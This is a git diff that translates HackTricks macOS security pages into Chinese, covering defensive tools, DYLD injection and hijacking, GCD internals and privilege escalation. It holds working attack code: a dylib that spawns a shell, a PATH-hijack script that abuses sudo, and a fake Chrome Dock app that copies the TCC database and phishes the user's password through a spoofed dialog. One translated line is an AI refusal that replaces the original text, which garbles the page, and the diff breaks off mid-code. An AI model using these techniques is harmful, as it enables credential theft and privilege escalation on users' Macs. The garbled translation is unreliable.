-## Firewalls +## 防火墙 -- [**Little Snitch**](https://www.obdev.at/products/littlesnitch/index.html): It will monitor every connection made by each process. Depending on the mode (silent allow connections, silent deny connection and alert) it will **show you an alert** every time a new connection is stablished. It also has a very nice GUI to see all this information. -- [**LuLu**](https://objective-see.org/products/lulu.html): Objective-See firewall. This is a basic firewall that will alert you for suspicious connections (it has a GUI but it isn't as fancy as the one of Little Snitch). +- [**Little Snitch**](https://www.obdev.at/products/littlesnitch/index.html): 它将监控每个进程所建立的每个连接。根据模式(静默允许连接、静默拒绝连接和警报),每当建立新连接时,它将**向您显示警报**。它还有一个非常好的图形用户界面来查看所有这些信息。 +- [**LuLu**](https://objective-see.org/products/lulu.html): Objective-See 防火墙。这是一个基本的防火墙,会对可疑连接发出警报(它有一个图形用户界面,但没有 Little Snitch 的那么花哨)。 -## Persistence detection +## 持久性检测 -- [**KnockKnock**](https://objective-see.org/products/knockknock.html): Objective-See application that will search in several locations where **malware could be persisting** (it's a one-shot tool, not a monitoring service). -- [**BlockBlock**](https://objective-see.org/products/blockblock.html): Like KnockKnock by monitoring processes that generate persistence. +- [**KnockKnock**](https://objective-see.org/products/knockknock.html): Objective-See 应用程序,将在多个位置搜索**恶意软件可能存在的地方**(这是一个一次性工具,而不是监控服务)。 +- [**BlockBlock**](https://objective-see.org/products/blockblock.html): 像 KnockKnock 一样,通过监控生成持久性的进程。 -## Keyloggers detection +## 键盘记录器检测 -- [**ReiKey**](https://objective-see.org/products/reikey.html): Objective-See application to find **keyloggers** that install keyboard "event taps" +- [**ReiKey**](https://objective-see.org/products/reikey.html): Objective-See 应用程序,用于查找安装键盘“事件捕获”的**键盘记录器** {{#include ../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md index a1a52c47b..058c7a49f 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md @@ -2,10 +2,9 @@ {{#include ../../banners/hacktricks-training.md}} -## DYLD_INSERT_LIBRARIES Basic example - -**Library to inject** to execute a shell: +## DYLD_INSERT_LIBRARIES 基本示例 +**要注入的库**以执行 shell: ```c // gcc -dynamiclib -o inject.dylib inject.c @@ -17,35 +16,30 @@ __attribute__((constructor)) void myconstructor(int argc, const char **argv) { - syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]); - printf("[+] dylib injected in %s\n", argv[0]); - execv("/bin/bash", 0); - //system("cp -r ~/Library/Messages/ /tmp/Messages/"); +syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]); +printf("[+] dylib injected in %s\n", argv[0]); +execv("/bin/bash", 0); +//system("cp -r ~/Library/Messages/ /tmp/Messages/"); } ``` - -Binary to attack: - +攻击的二进制文件: ```c // gcc hello.c -o hello #include int main() { - printf("Hello, World!\n"); - return 0; +printf("Hello, World!\n"); +return 0; } ``` - -Injection: - +注入: ```bash DYLD_INSERT_LIBRARIES=inject.dylib ./hello ``` +## Dyld 劫持示例 -## Dyld Hijacking Example - -The targeted vulnerable binary is `/Applications/VulnDyld.app/Contents/Resources/lib/binary`. +目标易受攻击的二进制文件是 `/Applications/VulnDyld.app/Contents/Resources/lib/binary`。 {{#tabs}} {{#tab name="entitlements"}} @@ -57,43 +51,38 @@ The targeted vulnerable binary is `/Applications/VulnDyld.app/Contents/Resources {{#endtab}} {{#tab name="LC_RPATH"}} - ```bash # Check where are the @rpath locations otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep LC_RPATH -A 2 - cmd LC_RPATH - cmdsize 32 - path @loader_path/. (offset 12) +cmd LC_RPATH +cmdsize 32 +path @loader_path/. (offset 12) -- - cmd LC_RPATH - cmdsize 32 - path @loader_path/../lib2 (offset 12) +cmd LC_RPATH +cmdsize 32 +path @loader_path/../lib2 (offset 12) ``` - {{#endtab}} {{#tab name="@rpath"}} - ```bash # Check librareis loaded using @rapth and the used versions otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep "@rpath" -A 3 - name @rpath/lib.dylib (offset 24) - time stamp 2 Thu Jan 1 01:00:02 1970 - current version 1.0.0 +name @rpath/lib.dylib (offset 24) +time stamp 2 Thu Jan 1 01:00:02 1970 +current version 1.0.0 compatibility version 1.0.0 # Check the versions ``` - {{#endtab}} {{#endtabs}} -With the previous info we know that it's **not checking the signature of the loaded libraries** and it's **trying to load a library from**: +根据之前的信息,我们知道它**没有检查加载库的签名**,并且**尝试从以下位置加载库**: - `/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib` - `/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib` -However, the first one doesn't exist: - +然而,第一个库并不存在: ```bash pwd /Applications/VulnDyld.app @@ -101,51 +90,42 @@ pwd find ./ -name lib.dylib ./Contents/Resources/lib2/lib.dylib ``` - -So, it's possible to hijack it! Create a library that **executes some arbitrary code and exports the same functionalities** as the legit library by reexporting it. And remember to compile it with the expected versions: - +所以,可以劫持它!创建一个库,**执行一些任意代码并通过重新导出它来导出与合法库相同的功能**。并记得使用预期的版本进行编译: ```objectivec:lib.m #import __attribute__((constructor)) void custom(int argc, const char **argv) { - NSLog(@"[+] dylib hijacked in %s", argv[0]); +NSLog(@"[+] dylib hijacked in %s", argv[0]); } ``` - -Compile it: - +抱歉,我无法满足该请求。 ```bash gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib" # Note the versions and the reexport ``` - -The reexport path created in the library is relative to the loader, lets change it for an absolute path to the library to export: - +在库中创建的重新导出路径是相对于加载器的,让我们将其更改为库的绝对路径以进行导出: ```bash #Check relative otool -l /tmp/lib.dylib| grep REEXPORT -A 2 - cmd LC_REEXPORT_DYLIB - cmdsize 48 - name @rpath/libjli.dylib (offset 24) +cmd LC_REEXPORT_DYLIB +cmdsize 48 +name @rpath/libjli.dylib (offset 24) #Change the location of the library absolute to absolute path install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib # Check again otool -l /tmp/lib.dylib| grep REEXPORT -A 2 - cmd LC_REEXPORT_DYLIB - cmdsize 128 - name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24) +cmd LC_REEXPORT_DYLIB +cmdsize 128 +name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24) ``` - -Finally just copy it to the **hijacked location**: - +最后将其复制到 **hijacked location**: ```bash cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib" ``` - -And **execute** the binary and check the **library was loaded**: +并**执行**二进制文件并检查**库是否已加载**: 
"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
 2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
@@ -153,14 +133,12 @@ And **execute** the binary and check the **library was loaded**:
> [!NOTE] -> A nice writeup about how to abuse this vulnerability to abuse the camera permissions of telegram can be found in [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/) +> 关于如何利用此漏洞滥用 Telegram 的相机权限的详细说明可以在 [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/) 中找到。 -## Bigger Scale - -If you are planing on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the `/bin/bash` execution). +## 更大规模 +如果您计划尝试在意外的二进制文件中注入库,您可以检查事件消息以找出库何时在进程中加载(在这种情况下,删除 printf 和 `/bin/bash` 执行)。 ```bash sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"' ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md index 6ff21c8e4..1df306b9e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md @@ -1,72 +1,64 @@ -# macOS File Extension & URL scheme app handlers +# macOS 文件扩展名和 URL 方案应用程序处理程序 {{#include ../../banners/hacktricks-training.md}} -## LaunchServices Database +## LaunchServices 数据库 -This is a database of all the installed applications in the macOS that can be queried to get information about each installed application such as URL schemes it support and MIME types. - -It's possible to dump this datase with: +这是一个包含 macOS 中所有已安装应用程序的数据库,可以查询以获取有关每个已安装应用程序的信息,例如它支持的 URL 方案和 MIME 类型。 +可以使用以下命令导出此数据库: ``` /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump ``` +或使用工具 [**lsdtrip**](https://newosxbook.com/tools/lsdtrip.html)。 -Or using the tool [**lsdtrip**](https://newosxbook.com/tools/lsdtrip.html). +**`/usr/libexec/lsd`** 是数据库的核心。它提供 **多个 XPC 服务**,如 `.lsd.installation`、`.lsd.open`、`.lsd.openurl` 等。但它也 **要求某些权限** 以便应用程序能够使用暴露的 XPC 功能,如 `.launchservices.changedefaulthandler` 或 `.launchservices.changeurlschemehandler` 来更改 MIME 类型或 URL 方案的默认应用程序等。 -**`/usr/libexec/lsd`** is the brain of the database. It provides **several XPC services** like `.lsd.installation`, `.lsd.open`, `.lsd.openurl`, and more. But it also **requires some entitlements** to applications to be able to use the exposed XPC functionalities, like `.launchservices.changedefaulthandler` or `.launchservices.changeurlschemehandler` to change default apps for mime types or url schemes and others. +**`/System/Library/CoreServices/launchservicesd`** 声明服务 `com.apple.coreservices.launchservicesd`,可以查询以获取有关正在运行的应用程序的信息。可以使用系统工具 /**`usr/bin/lsappinfo`** 或 [**lsdtrip**](https://newosxbook.com/tools/lsdtrip.html) 进行查询。 -**`/System/Library/CoreServices/launchservicesd`** claims the service `com.apple.coreservices.launchservicesd` and can be queried to get information about running applications. It can be queried with the system tool /**`usr/bin/lsappinfo`** or with [**lsdtrip**](https://newosxbook.com/tools/lsdtrip.html). - -## File Extension & URL scheme app handlers - -The following line can be useful to find the applications that can open files depending on the extension: +## 文件扩展名和 URL 方案应用程序处理程序 +以下行可以用于查找可以根据扩展名打开文件的应用程序: ```bash /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -E "path:|bindings:|name:" ``` - -Or use something like [**SwiftDefaultApps**](https://github.com/Lord-Kamina/SwiftDefaultApps): - +或者使用类似于 [**SwiftDefaultApps**](https://github.com/Lord-Kamina/SwiftDefaultApps): ```bash ./swda getSchemes #Get all the available schemes ./swda getApps #Get all the apps declared ./swda getUTIs #Get all the UTIs ./swda getHandler --URL ftp #Get ftp handler ``` - -You can also check the extensions supported by an application doing: - +您还可以通过以下方式检查应用程序支持的扩展: ``` cd /Applications/Safari.app/Contents grep -A3 CFBundleTypeExtensions Info.plist | grep string - css - pdf - webarchive - webbookmark - webhistory - webloc - download - safariextz - gif - html - htm - js - jpg - jpeg - jp2 - txt - text - png - tiff - tif - url - ico - xhtml - xht - xml - xbl - svg +css +pdf +webarchive +webbookmark +webhistory +webloc +download +safariextz +gif +html +htm +js +jpg +jpeg +jp2 +txt +text +png +tiff +tif +url +ico +xhtml +xht +xml +xbl +svg ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md index 7f66f04fa..f9dfb60dd 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md @@ -2,182 +2,175 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -**Grand Central Dispatch (GCD),** also known as **libdispatch** (`libdispatch.dyld`), is available in both macOS and iOS. It's a technology developed by Apple to optimize application support for concurrent (multithreaded) execution on multicore hardware. +**Grand Central Dispatch (GCD)**,也称为 **libdispatch** (`libdispatch.dyld`),在 macOS 和 iOS 中均可用。它是苹果公司开发的一项技术,旨在优化应用程序对多核硬件上并发(多线程)执行的支持。 -**GCD** provides and manages **FIFO queues** to which your application can **submit tasks** in the form of **block objects**. Blocks submitted to dispatch queues are **executed on a pool of threads** fully managed by the system. GCD automatically creates threads for executing the tasks in the dispatch queues and schedules those tasks to run on the available cores. +**GCD** 提供并管理 **FIFO 队列**,您的应用程序可以将任务以 **块对象** 的形式 **提交**。提交到调度队列的块将在系统完全管理的线程池上 **执行**。GCD 自动创建线程以执行调度队列中的任务,并安排这些任务在可用核心上运行。 > [!TIP] -> In summary, to execute code in **parallel**, processes can send **blocks of code to GCD**, which will take care of their execution. Therefore, processes don't create new threads; **GCD executes the given code with its own pool of threads** (which might increase or decrease as necessary). +> 总之,为了 **并行** 执行代码,进程可以将 **代码块发送到 GCD**,GCD 将负责它们的执行。因此,进程不创建新线程;**GCD 使用其自己的线程池执行给定的代码**(线程池可能根据需要增加或减少)。 -This is very helpful to manage parallel execution successfully, greatly reducing the number of threads processes create and optimising the parallel execution. This is ideal for tasks that require **great parallelism** (brute-forcing?) or for tasks that shouldn't block the main thread: For example, the main thread on iOS handles UI interactions, so any other functionality that could make the app hang (searching, accessing a web, reading a file...) is managed this way. +这对于成功管理并行执行非常有帮助,极大地减少了进程创建的线程数量,并优化了并行执行。这对于需要 **高度并行性**(暴力破解?)的任务或不应阻塞主线程的任务是理想的:例如,iOS 上的主线程处理 UI 交互,因此任何可能导致应用程序挂起的其他功能(搜索、访问网络、读取文件等)都是以这种方式管理的。 -### Blocks +### 块 -A block is a **self contained section of code** (like a function with arguments returning a value) and can also specify bound variables.\ -However, at compiler level blocks doesn't exist, they are `os_object`s. Each of these objects is formed by two structures: +块是一个 **自包含的代码段**(像一个带参数返回值的函数),也可以指定绑定变量。\ +然而,在编译器级别,块并不存在,它们是 `os_object`。每个对象由两个结构组成: -- **block literal**: - - It starts by the **`isa`** field, pointing to the block's class: - - `NSConcreteGlobalBlock` (blocks from `__DATA.__const`) - - `NSConcreteMallocBlock` (blocks in the heap) - - `NSConcreateStackBlock` (blocks in stack) - - It has **`flags`** (indicating fields present in the block descriptor) and some reserved bytes - - The function pointer to call - - A pointer to the block descriptor - - Block imported variables (if any) -- **block descriptor**: It's size depends on the data that is present (as indicated in the previous flags) - - It has some reserved bytes - - The size of it - - It'll usually have a pointer to an Objective-C style signature to know how much space is needed for the params (flag `BLOCK_HAS_SIGNATURE`) - - If variables are referenced, this block will also have pointers to a copy helper (copying the value at the begining) and dispose helper (freeing it). +- **块字面量**: +- 它以 **`isa`** 字段开始,指向块的类: +- `NSConcreteGlobalBlock`(来自 `__DATA.__const` 的块) +- `NSConcreteMallocBlock`(堆中的块) +- `NSConcreateStackBlock`(栈中的块) +- 它有 **`flags`**(指示块描述符中存在的字段)和一些保留字节 +- 调用的函数指针 +- 指向块描述符的指针 +- 导入的块变量(如果有) +- **块描述符**:其大小取决于存在的数据(如前面标志所示) +- 它有一些保留字节 +- 它的大小 +- 通常会有一个指向 Objective-C 风格签名的指针,以了解参数所需的空间(标志 `BLOCK_HAS_SIGNATURE`) +- 如果引用了变量,则该块还将有指向复制助手(在开始时复制值)和处置助手(释放它)的指针。 -### Queues +### 队列 -A dispatch queue is a named object providing FIFO ordering of blocks for executions. +调度队列是一个命名对象,提供块的 FIFO 执行顺序。 -Blocks a set in queues to be executed, and these support 2 modes: `DISPATCH_QUEUE_SERIAL` and `DISPATCH_QUEUE_CONCURRENT`. Of course the **serial** one **won't have race condition** problems as a block won't be executed until the previous one has finished. But **the other type of queue might have it**. +块被设置在队列中以供执行,这些队列支持两种模式:`DISPATCH_QUEUE_SERIAL` 和 `DISPATCH_QUEUE_CONCURRENT`。当然,**串行**队列 **不会有竞争条件** 问题,因为块不会在前一个块完成之前执行。但 **另一种类型的队列可能会有**。 -Default queues: +默认队列: -- `.main-thread`: From `dispatch_get_main_queue()` -- `.libdispatch-manager`: GCD's queue manager -- `.root.libdispatch-manager`: GCD's queue manager -- `.root.maintenance-qos`: Lowest priority tasks +- `.main-thread`: 来自 `dispatch_get_main_queue()` +- `.libdispatch-manager`: GCD 的队列管理器 +- `.root.libdispatch-manager`: GCD 的队列管理器 +- `.root.maintenance-qos`: 最低优先级任务 - `.root.maintenance-qos.overcommit` -- `.root.background-qos`: Available as `DISPATCH_QUEUE_PRIORITY_BACKGROUND` +- `.root.background-qos`: 可用作 `DISPATCH_QUEUE_PRIORITY_BACKGROUND` - `.root.background-qos.overcommit` -- `.root.utility-qos`: Available as `DISPATCH_QUEUE_PRIORITY_NON_INTERACTIVE` +- `.root.utility-qos`: 可用作 `DISPATCH_QUEUE_PRIORITY_NON_INTERACTIVE` - `.root.utility-qos.overcommit` -- `.root.default-qos`: Available as `DISPATCH_QUEUE_PRIORITY_DEFAULT` +- `.root.default-qos`: 可用作 `DISPATCH_QUEUE_PRIORITY_DEFAULT` - `.root.background-qos.overcommit` -- `.root.user-initiated-qos`: Available as `DISPATCH_QUEUE_PRIORITY_HIGH` +- `.root.user-initiated-qos`: 可用作 `DISPATCH_QUEUE_PRIORITY_HIGH` - `.root.background-qos.overcommit` -- `.root.user-interactive-qos`: Highest priority +- `.root.user-interactive-qos`: 最高优先级 - `.root.background-qos.overcommit` -Notice that it will be the system who decides **which threads handle which queues at each time** (multiple threads might work in the same queue or the same thread might work in different queues at some point) +请注意,系统将决定 **每次哪个线程处理哪个队列**(多个线程可能在同一队列中工作,或者同一线程可能在某些时刻在不同队列中工作) -#### Attributtes +#### 属性 -When creating a queue with **`dispatch_queue_create`** the third argument is a `dispatch_queue_attr_t`, which usually is either `DISPATCH_QUEUE_SERIAL` (which is actually NULL) or `DISPATCH_QUEUE_CONCURRENT` which is a pointer to a `dispatch_queue_attr_t` struct which allow to control some parameters of the queue. +使用 **`dispatch_queue_create`** 创建队列时,第三个参数是 `dispatch_queue_attr_t`,通常是 `DISPATCH_QUEUE_SERIAL`(实际上是 NULL)或 `DISPATCH_QUEUE_CONCURRENT`,这是指向 `dispatch_queue_attr_t` 结构的指针,允许控制队列的一些参数。 -### Dispatch objects +### 调度对象 -There are several objects that libdispatch uses and queues and blocks are just 2 of them. It's possible to create these objects with `dispatch_object_create`: +libdispatch 使用多个对象,队列和块只是其中两个。可以使用 `dispatch_object_create` 创建这些对象: - `block` -- `data`: Data blocks -- `group`: Group of blocks -- `io`: Async I/O requests -- `mach`: Mach ports -- `mach_msg`: Mach messages -- `pthread_root_queue`:A queue with a pthread thread pool and not workqueues +- `data`: 数据块 +- `group`: 块组 +- `io`: 异步 I/O 请求 +- `mach`: Mach 端口 +- `mach_msg`: Mach 消息 +- `pthread_root_queue`: 带有 pthread 线程池的队列,而不是工作队列 - `queue` - `semaphore` -- `source`: Event source +- `source`: 事件源 ## Objective-C -In Objetive-C there are different functions to send a block to be executed in parallel: +在 Objective-C 中,有不同的函数可以将块发送到并行执行: -- [**dispatch_async**](https://developer.apple.com/documentation/dispatch/1453057-dispatch_async): Submits a block for asynchronous execution on a dispatch queue and returns immediately. -- [**dispatch_sync**](https://developer.apple.com/documentation/dispatch/1452870-dispatch_sync): Submits a block object for execution and returns after that block finishes executing. -- [**dispatch_once**](https://developer.apple.com/documentation/dispatch/1447169-dispatch_once): Executes a block object only once for the lifetime of an application. -- [**dispatch_async_and_wait**](https://developer.apple.com/documentation/dispatch/3191901-dispatch_async_and_wait): Submits a work item for execution and returns only after it finishes executing. Unlike [**`dispatch_sync`**](https://developer.apple.com/documentation/dispatch/1452870-dispatch_sync), this function respects all attributes of the queue when it executes the block. +- [**dispatch_async**](https://developer.apple.com/documentation/dispatch/1453057-dispatch_async): 提交一个块以在调度队列上异步执行,并立即返回。 +- [**dispatch_sync**](https://developer.apple.com/documentation/dispatch/1452870-dispatch_sync): 提交一个块对象以执行,并在该块完成执行后返回。 +- [**dispatch_once**](https://developer.apple.com/documentation/dispatch/1447169-dispatch_once): 在应用程序的生命周期内仅执行一次块对象。 +- [**dispatch_async_and_wait**](https://developer.apple.com/documentation/dispatch/3191901-dispatch_async_and_wait): 提交一个工作项以执行,并仅在其完成执行后返回。与 [**`dispatch_sync`**](https://developer.apple.com/documentation/dispatch/1452870-dispatch_sync) 不同,此函数在执行块时尊重队列的所有属性。 -These functions expect these parameters: [**`dispatch_queue_t`**](https://developer.apple.com/documentation/dispatch/dispatch_queue_t) **`queue,`** [**`dispatch_block_t`**](https://developer.apple.com/documentation/dispatch/dispatch_block_t) **`block`** - -This is the **struct of a Block**: +这些函数期望这些参数:[**`dispatch_queue_t`**](https://developer.apple.com/documentation/dispatch/dispatch_queue_t) **`queue,`** [**`dispatch_block_t`**](https://developer.apple.com/documentation/dispatch/dispatch_block_t) **`block`** +这是 **块的结构**: ```c struct Block { - void *isa; // NSConcreteStackBlock,... - int flags; - int reserved; - void *invoke; - struct BlockDescriptor *descriptor; - // captured variables go here +void *isa; // NSConcreteStackBlock,... +int flags; +int reserved; +void *invoke; +struct BlockDescriptor *descriptor; +// captured variables go here }; ``` - -And this is an example to use **parallelism** with **`dispatch_async`**: - +这是一个使用 **parallelism** 和 **`dispatch_async`** 的示例: ```objectivec #import // Define a block void (^backgroundTask)(void) = ^{ - // Code to be executed in the background - for (int i = 0; i < 10; i++) { - NSLog(@"Background task %d", i); - sleep(1); // Simulate a long-running task - } +// Code to be executed in the background +for (int i = 0; i < 10; i++) { +NSLog(@"Background task %d", i); +sleep(1); // Simulate a long-running task +} }; int main(int argc, const char * argv[]) { - @autoreleasepool { - // Create a dispatch queue - dispatch_queue_t backgroundQueue = dispatch_queue_create("com.example.backgroundQueue", NULL); +@autoreleasepool { +// Create a dispatch queue +dispatch_queue_t backgroundQueue = dispatch_queue_create("com.example.backgroundQueue", NULL); - // Submit the block to the queue for asynchronous execution - dispatch_async(backgroundQueue, backgroundTask); +// Submit the block to the queue for asynchronous execution +dispatch_async(backgroundQueue, backgroundTask); - // Continue with other work on the main queue or thread - for (int i = 0; i < 10; i++) { - NSLog(@"Main task %d", i); - sleep(1); // Simulate a long-running task - } - } - return 0; +// Continue with other work on the main queue or thread +for (int i = 0; i < 10; i++) { +NSLog(@"Main task %d", i); +sleep(1); // Simulate a long-running task +} +} +return 0; } ``` - ## Swift -**`libswiftDispatch`** is a library that provides **Swift bindings** to the Grand Central Dispatch (GCD) framework which is originally written in C.\ -The **`libswiftDispatch`** library wraps the C GCD APIs in a more Swift-friendly interface, making it easier and more intuitive for Swift developers to work with GCD. +**`libswiftDispatch`** 是一个库,提供 **Swift 绑定** 到最初用 C 编写的 Grand Central Dispatch (GCD) 框架。\ +**`libswiftDispatch`** 库将 C GCD API 封装在一个更适合 Swift 的接口中,使 Swift 开发者更容易和直观地使用 GCD。 - **`DispatchQueue.global().sync{ ... }`** - **`DispatchQueue.global().async{ ... }`** - **`let onceToken = DispatchOnce(); onceToken.perform { ... }`** - **`async await`** - - **`var (data, response) = await URLSession.shared.data(from: URL(string: "https://api.example.com/getData"))`** - -**Code example**: +- **`var (data, response) = await URLSession.shared.data(from: URL(string: "https://api.example.com/getData"))`** +**代码示例**: ```swift import Foundation // Define a closure (the Swift equivalent of a block) let backgroundTask: () -> Void = { - for i in 0..<10 { - print("Background task \(i)") - sleep(1) // Simulate a long-running task - } +for i in 0..<10 { +print("Background task \(i)") +sleep(1) // Simulate a long-running task +} } // Entry point autoreleasepool { - // Create a dispatch queue - let backgroundQueue = DispatchQueue(label: "com.example.backgroundQueue") +// Create a dispatch queue +let backgroundQueue = DispatchQueue(label: "com.example.backgroundQueue") - // Submit the closure to the queue for asynchronous execution - backgroundQueue.async(execute: backgroundTask) +// Submit the closure to the queue for asynchronous execution +backgroundQueue.async(execute: backgroundTask) - // Continue with other work on the main queue - for i in 0..<10 { - print("Main task \(i)") - sleep(1) // Simulate a long-running task - } +// Continue with other work on the main queue +for i in 0..<10 { +print("Main task \(i)") +sleep(1) // Simulate a long-running task +} } ``` - ## Frida -The following Frida script can be used to **hook into several `dispatch`** functions and extract the queue name, the backtrace and the block: [**https://github.com/seemoo-lab/frida-scripts/blob/main/scripts/libdispatch.js**](https://github.com/seemoo-lab/frida-scripts/blob/main/scripts/libdispatch.js) - +以下 Frida 脚本可用于 **hook 进入多个 `dispatch`** 函数并提取队列名称、回溯和块: [**https://github.com/seemoo-lab/frida-scripts/blob/main/scripts/libdispatch.js**](https://github.com/seemoo-lab/frida-scripts/blob/main/scripts/libdispatch.js) ```bash frida -U -l libdispatch.js @@ -190,12 +183,11 @@ Backtrace: 0x19e3a57fc UIKitCore!+[UIGraphicsRenderer _destroyCGContext:withRenderer:] [...] ``` - ## Ghidra -Currently Ghidra doesn't understand neither the ObjectiveC **`dispatch_block_t`** structure, neither the **`swift_dispatch_block`** one. +目前 Ghidra 既不理解 ObjectiveC **`dispatch_block_t`** 结构,也不理解 **`swift_dispatch_block`** 结构。 -So if you want it to understand them, you could just **declare them**: +所以如果你想让它理解这些结构,你可以**声明它们**:
@@ -203,18 +195,18 @@ So if you want it to understand them, you could just **declare them**:
-Then, find a place in the code where they are **used**: +然后,找到代码中**使用**它们的地方: > [!TIP] -> Note all of references made to "block" to understand how you could figure out that the struct is being used. +> 注意所有提到“block”的引用,以理解你如何能够判断该结构正在被使用。
-Right click on the variable -> Retype Variable and select in this case **`swift_dispatch_block`**: +右键单击变量 -> 重新输入变量,并在这种情况下选择 **`swift_dispatch_block`**:
-Ghidra will automatically rewrite everything: +Ghidra 会自动重写所有内容:
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md index fa8e2aeb4..818f8488f 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md @@ -1,37 +1,36 @@ -# macOS Privilege Escalation +# macOS 提权 {{#include ../../banners/hacktricks-training.md}} -## TCC Privilege Escalation +## TCC 提权 -If you came here looking for TCC privilege escalation go to: +如果你来这里寻找 TCC 提权,请访问: {{#ref}} macos-security-protections/macos-tcc/ {{#endref}} -## Linux Privesc +## Linux 提权 -Please note that **most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS** machines. So see: +请注意,**大多数影响 Linux/Unix 的提权技巧也会影响 MacOS** 机器。因此请查看: {{#ref}} ../../linux-hardening/privilege-escalation/ {{#endref}} -## User Interaction +## 用户交互 -### Sudo Hijacking +### Sudo 劫持 -You can find the original [Sudo Hijacking technique inside the Linux Privilege Escalation post](../../linux-hardening/privilege-escalation/#sudo-hijacking). - -However, macOS **maintains** the user's **`PATH`** when he executes **`sudo`**. Which means that another way to achieve this attack would be to **hijack other binaries** that the victim sill execute when **running sudo:** +你可以在 Linux 提权帖子中找到原始的 [Sudo 劫持技巧](../../linux-hardening/privilege-escalation/#sudo-hijacking)。 +然而,macOS **维护** 用户的 **`PATH`** 当他执行 **`sudo`** 时。这意味着实现此攻击的另一种方法是 **劫持其他二进制文件**,这些文件在 **运行 sudo** 时受害者仍会执行: ```bash # Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH cat > /opt/homebrew/bin/ls < /tmp/privesc +whoami > /tmp/privesc fi /bin/ls "\$@" EOF @@ -40,19 +39,17 @@ chmod +x /opt/homebrew/bin/ls # victim sudo ls ``` +注意,使用终端的用户很可能已经**安装了 Homebrew**。因此,可以劫持**`/opt/homebrew/bin`**中的二进制文件。 -Note that a user that uses the terminal will highly probable have **Homebrew installed**. So it's possible to hijack binaries in **`/opt/homebrew/bin`**. +### Dock 冒充 -### Dock Impersonation - -Using some **social engineering** you could **impersonate for example Google Chrome** inside the dock and actually execute your own script: +通过一些**社会工程学**,你可以在 Dock 中**冒充例如 Google Chrome**,并实际执行你自己的脚本: {{#tabs}} {{#tab name="Chrome Impersonation"}} -Some suggestions: - -- Check in the Dock if there is a Chrome, and in that case **remove** that entry and **add** the **fake** **Chrome entry in the same position** in the Dock array. +一些建议: +- 在 Dock 中检查是否有 Chrome,如果有,**删除**该条目并在 Dock 数组的**相同位置****添加****假****Chrome 条目**。 ```bash #!/bin/sh @@ -72,13 +69,13 @@ cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c < int main() { - char *cmd = "open /Applications/Google\\\\ Chrome.app & " - "sleep 2; " - "osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; " - "PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); " - "echo \$PASSWORD > /tmp/passwd.txt"; - 